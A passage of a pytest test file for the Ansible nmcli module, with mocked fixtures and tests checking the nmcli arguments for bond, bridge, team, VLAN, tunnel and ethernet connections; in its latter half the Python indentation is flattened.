               execute_return=(0, TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_ethernet_connection_dhcp_unchanged(mocker):
    # Existing DHCP ethernet connection already matching the testcase.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_ethernet_connection_static_unchanged(mocker):
    # Existing static ethernet connection already matching the testcase.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_ETHERNET_STATIC_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_ethernet_connection_with_ipv6_address_static_modify(mocker):
    # First call returns the current (IPv6 static) state, second call is the
    # successful 'con modify' invocation.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_ETHERNET_STATIC_IP6_ADDRESS_SHOW_OUTPUT, ""),
                   (0, "", ""),
               ))


@pytest.fixture
def mocked_ethernet_connection_dhcp_to_static(mocker):
    # Current state is DHCP; the module should issue a modify to go static.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT, ""),
                   (0, "", ""),
               ))


@pytest.fixture
def mocked_wireless_create(mocker):
    # Show-defaults first, then a successful create.
    mocker_set(mocker,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_DEFAULT_WIRELESS_SHOW_OUTPUT, ""),
                   (0, "", ""),
               ))


@pytest.fixture
def mocked_secure_wireless_create(mocker):
    # Show-defaults, then two successful nmcli invocations for the
    # secure-wireless create flow.
    mocker_set(mocker,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
                   (0, "", ""),
                   (0, "", ""),
               ))


@pytest.fixture
def mocked_secure_wireless_create_failure(mocker):
    # Second invocation fails (rc=1) to exercise the create error path.
    mocker_set(mocker,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
                   (1, "", ""),
               ))


@pytest.fixture
def mocked_secure_wireless_modify(mocker):
    # Existing connection; show-defaults followed by three successful calls.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
                   (0, "", ""),
                   (0, "", ""),
                   (0, "", ""),
               ))


@pytest.fixture
def mocked_secure_wireless_modify_failure(mocker):
    # Third invocation fails (rc=1) to exercise the modify error path.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
                   (0, "", ""),
                   (1, "", ""),
               ))


@pytest.fixture
def mocked_dummy_connection_static_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_DUMMY_STATIC_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_dummy_connection_static_without_mtu_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_DUMMY_STATIC_WITHOUT_MTU_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_dummy_connection_static_with_custom_mtu_modify(mocker):
    # Current state has a custom MTU; the module should issue a modify.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=None,
               execute_side_effect=(
                   (0, TESTCASE_DUMMY_STATIC_WITH_CUSTOM_MTU_SHOW_OUTPUT, ""),
                   (0, "", ""),
               ))


@pytest.fixture
def mocked_gsm_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_GSM_SHOW_OUTPUT, ""))
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BOND, indirect=['patch_ansible_module'])
def test_bond_connection_create(mocked_generic_connection_create, capfd):
    """
    Test : Bond connection created
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Exactly one nmcli invocation: the 'con add' command.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    # Fixed positional prefix of the command line.
    assert args[0][0] == '/usr/bin/nmcli'
    assert args[0][1] == 'con'
    assert args[0][2] == 'add'
    assert args[0][3] == 'type'
    assert args[0][4] == 'bond'
    assert args[0][5] == 'con-name'
    assert args[0][6] == 'non_existent_nw_device'

    # Remaining key/value options may appear in any order.
    for param in ['ipv4.gateway', 'primary', 'connection.autoconnect',
                  'connection.interface-name', 'bond_non_existant',
                  'mode', 'active-backup', 'ipv4.addresses']:
        assert param in args[0]

    # Module exits via fail_json/exit_json printing JSON to stdout.
    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BOND, indirect=['patch_ansible_module'])
def test_bond_connection_unchanged(mocked_bond_connection_unchanged, capfd):
    """
    Test : Bond connection unchanged
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC, indirect=['patch_ansible_module'])
def test_generic_connection_create(mocked_generic_connection_create, capfd):
    """
    Test : Generic connection created
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Single 'con add' invocation with a fixed positional prefix.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert args[0][0] == '/usr/bin/nmcli'
    assert args[0][1] == 'con'
    assert args[0][2] == 'add'
    assert args[0][3] == 'type'
    assert args[0][4] == 'generic'
    assert args[0][5] == 'con-name'
    assert args[0][6] == 'non_existent_nw_device'

    # Option names may appear in any order after the prefix.
    for param in ['connection.autoconnect', 'ipv4.gateway', 'ipv4.addresses']:
        assert param in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC, indirect=['patch_ansible_module'])
def test_generic_connection_modify(mocked_generic_connection_modify, capfd):
    """
    Test : Generic connection modify
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Single 'con modify <name>' invocation.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert args[0][0] == '/usr/bin/nmcli'
    assert args[0][1] == 'con'
    assert args[0][2] == 'modify'
    assert args[0][3] == 'non_existent_nw_device'

    for param in ['ipv4.gateway', 'ipv4.addresses']:
        assert param in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC, indirect=['patch_ansible_module'])
def test_generic_connection_unchanged(mocked_generic_connection_unchanged, capfd):
    """
    Test : Generic connection unchanged
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_MODIFY_ROUTING_RULES, indirect=['patch_ansible_module'])
def test_generic_connection_modify_routing_rules4(mocked_generic_connection_create, capfd):
    """
    Test : Generic connection modified with routing-rules4
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Only checks that the routing-rules option made it onto the command line.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert 'ipv4.routing-rules' in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_DNS4_SEARCH, indirect=['patch_ansible_module'])
def test_generic_connection_create_dns_search(mocked_generic_connection_create, capfd):
    """
    Test : Generic connection created with dns search
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Both v4 and v6 search domains must be passed on create.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert 'ipv4.dns-search' in args[0]
    assert 'ipv6.dns-search' in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_DNS4_SEARCH, indirect=['patch_ansible_module'])
def test_generic_connection_modify_dns_search(mocked_generic_connection_create, capfd):
    """
    Test : Generic connection modified with dns search
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Both v4 and v6 search domains must be passed on modify.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert 'ipv4.dns-search' in args[0]
    assert 'ipv6.dns-search' in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_DNS4_SEARCH, indirect=['patch_ansible_module'])
def test_generic_connection_dns_search_unchanged(mocked_generic_connection_dns_search_unchanged, capfd):
    """
    Test : Generic connection with dns search unchanged
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert not results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_CONNECTION, indirect=['patch_ansible_module'])
def test_dns4_none(mocked_connection_exists, capfd):
    """
    Test if DNS4 param is None
    """
    # state=absent on an existing connection: deletion reports changed=True.
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_ZONE, indirect=['patch_ansible_module'])
def test_generic_connection_create_zone(mocked_generic_connection_create, capfd):
    """
    Test : Generic connection created with zone
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Firewalld zone must be passed on create.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert 'connection.zone' in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_ZONE, indirect=['patch_ansible_module'])
def test_generic_connection_modify_zone(mocked_generic_connection_create, capfd):
    """
    Test : Generic connection modified with zone
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Firewalld zone must be passed on modify.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert 'connection.zone' in args[0]

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_ZONE, indirect=['patch_ansible_module'])
def test_generic_connection_zone_unchanged(mocked_generic_connection_zone_unchanged, capfd):
    """
    Test : Generic connection with zone unchanged
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert not results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_CONNECTION, indirect=['patch_ansible_module'])
def test_zone_none(mocked_connection_exists, capfd):
    """
    Test if zone param is None
    """
    # state=absent on an existing connection: deletion reports changed=True.
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE, indirect=['patch_ansible_module'])
def test_create_bridge(mocked_generic_connection_create, capfd):
    """
    Test if Bridge created
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Single 'con add type bridge' invocation.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert args[0][0] == '/usr/bin/nmcli'
    assert args[0][1] == 'con'
    assert args[0][2] == 'add'
    assert args[0][3] == 'type'
    assert args[0][4] == 'bridge'
    assert args[0][5] == 'con-name'
    assert args[0][6] == 'non_existent_nw_device'

    # Normalize to text: some option values (e.g. maxage) are ints.
    args_text = list(map(to_text, args[0]))
    for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'bridge.max-age', '100', 'bridge.stp', 'yes']:
        assert param in args_text

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE, indirect=['patch_ansible_module'])
def test_mod_bridge(mocked_generic_connection_modify, capfd):
    """
    Test if Bridge modified
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    # Single 'con modify <name>' invocation.
    assert nmcli.Nmcli.execute_command.call_count == 1
    arg_list = nmcli.Nmcli.execute_command.call_args_list
    args, kwargs = arg_list[0]
    assert args[0][0] == '/usr/bin/nmcli'
    assert args[0][1] == 'con'
    assert args[0][2] == 'modify'
    assert args[0][3] == 'non_existent_nw_device'

    # Normalize to text: some option values (e.g. maxage) are ints.
    args_text = list(map(to_text, args[0]))
    for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'bridge.max-age', '100', 'bridge.stp', 'yes']:
        assert param in args_text

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert results['changed']


@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE, indirect=['patch_ansible_module'])
def test_bridge_connection_unchanged(mocked_bridge_connection_unchanged, capfd):
    """
    Test : Bridge connection unchanged
    """
    with pytest.raises(SystemExit):
        nmcli.main()

    out, err = capfd.readouterr()
    results = json.loads(out)
    assert not results.get('failed')
    assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE_SLAVE, indirect=['patch_ansible_module'])
def test_create_bridge_slave(mocked_generic_connection_create, capfd):
"""
Test if Bridge_slave created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'bridge-slave'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['bridge-port.path-cost', '100']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE_SLAVE, indirect=['patch_ansible_module'])
def test_mod_bridge_slave(mocked_generic_connection_modify, capfd):
"""
Test if Bridge_slave modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['bridge-port.path-cost', '100']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE_SLAVE, indirect=['patch_ansible_module'])
def test_bridge_slave_unchanged(mocked_bridge_slave_unchanged, capfd):
"""
Test : Bridge-slave connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM, indirect=['patch_ansible_module'])
def test_team_connection_create(mocked_generic_connection_create, capfd):
"""
Test : Team connection created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'team'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
for param in ['connection.autoconnect', 'connection.interface-name', 'team0_non_existant']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM, indirect=['patch_ansible_module'])
def test_team_connection_unchanged(mocked_team_connection_unchanged, capfd):
"""
Test : Team connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM_HWADDR_POLICY_FAILS, indirect=['patch_ansible_module'])
def test_team_connection_create_hwaddr_policy_fails(mocked_generic_connection_create, capfd):
"""
Test : Team connection created
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert results.get('failed')
assert results['msg'] == "Runner-hwaddr-policy is only allowed for runner activebackup"
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM_SLAVE, indirect=['patch_ansible_module'])
def test_create_team_slave(mocked_generic_connection_create, capfd):
"""
Test if Team_slave created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'team-slave'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_slaved_device'
for param in ['connection.autoconnect', 'connection.interface-name', 'connection.master', 'team0_non_existant', 'connection.slave-type']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM_SLAVE, indirect=['patch_ansible_module'])
def test_team_slave_connection_unchanged(mocked_team_slave_connection_unchanged, capfd):
"""
Test : Team slave connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VLAN, indirect=['patch_ansible_module'])
def test_create_vlan_con(mocked_generic_connection_create, capfd):
"""
Test if VLAN created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'vlan'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'vlan.id', '10']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VLAN, indirect=['patch_ansible_module'])
def test_mod_vlan_conn(mocked_generic_connection_modify, capfd):
"""
Test if VLAN modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'vlan.id', '10']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VLAN, indirect=['patch_ansible_module'])
def test_vlan_connection_unchanged(mocked_vlan_connection_unchanged, capfd):
"""
Test : VLAN connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VXLAN, indirect=['patch_ansible_module'])
def test_create_vxlan(mocked_generic_connection_create, capfd):
"""
Test if vxlan created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'vxlan'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'vxlan-existent_nw_device',
'vxlan.local', '192.168.225.5', 'vxlan.remote', '192.168.225.6', 'vxlan.id', '11']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VXLAN, indirect=['patch_ansible_module'])
def test_vxlan_mod(mocked_generic_connection_modify, capfd):
"""
Test if vxlan modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['vxlan.local', '192.168.225.5', 'vxlan.remote', '192.168.225.6', 'vxlan.id', '11']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VXLAN, indirect=['patch_ansible_module'])
def test_vxlan_connection_unchanged(mocked_vxlan_connection_unchanged, capfd):
"""
Test : VxLAN connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_IPIP, indirect=['patch_ansible_module'])
def test_create_ipip(mocked_generic_connection_create, capfd):
"""
Test if ipip created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'ip-tunnel'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'ipip-existent_nw_device',
'ip-tunnel.local', '192.168.225.5',
'ip-tunnel.mode', 'ipip',
'ip-tunnel.parent', 'non_existent_ipip_device',
'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_IPIP, indirect=['patch_ansible_module'])
def test_ipip_mod(mocked_generic_connection_modify, capfd):
"""
Test if ipip modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ip-tunnel.local', '192.168.225.5', 'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_IPIP, indirect=['patch_ansible_module'])
def test_ipip_connection_unchanged(mocked_ipip_connection_unchanged, capfd):
"""
Test : IPIP connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SIT, indirect=['patch_ansible_module'])
def test_create_sit(mocked_generic_connection_create, capfd):
"""
Test if sit created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'ip-tunnel'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'sit-existent_nw_device',
'ip-tunnel.local', '192.168.225.5',
'ip-tunnel.mode', 'sit',
'ip-tunnel.parent', 'non_existent_sit_device',
'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SIT, indirect=['patch_ansible_module'])
def test_sit_mod(mocked_generic_connection_modify, capfd):
"""
Test if sit modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ip-tunnel.local', '192.168.225.5', 'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SIT, indirect=['patch_ansible_module'])
def test_sit_connection_unchanged(mocked_sit_connection_unchanged, capfd):
"""
Test : SIT connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_DHCP, indirect=['patch_ansible_module'])
def test_eth_dhcp_client_id_con_create(mocked_generic_connection_create, capfd):
"""
Test : Ethernet connection created with DHCP_CLIENT_ID
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'ipv4.dhcp-client-id' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GRE, indirect=['patch_ansible_module'])
def test_create_gre(mocked_generic_connection_create, capfd):
"""
Test if gre created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'ip-tunnel'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'gre-existent_nw_device',
'ip-tunnel.local', '192.168.225.5',
'ip-tunnel.mode', 'gre',
'ip-tunnel.parent', 'non_existent_gre_device',
'ip-tunnel.remote', '192.168.225.6',
'ip-tunnel.input-key', '1',
'ip-tunnel.output-key', '2']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GRE, indirect=['patch_ansible_module'])
def test_gre_mod(mocked_generic_connection_modify, capfd):
"""
Test if gre modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ip-tunnel.local', '192.168.225.5', 'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GRE, indirect=['patch_ansible_module'])
def test_gre_connection_unchanged(mocked_gre_connection_unchanged, capfd):
"""
Test : GRE connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_DHCP, indirect=['patch_ansible_module'])
def test_ethernet_connection_dhcp_unchanged(mocked_ethernet_connection_dhcp_unchanged, capfd):
"""
Test : Ethernet connection with DHCP_CLIENT_ID unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
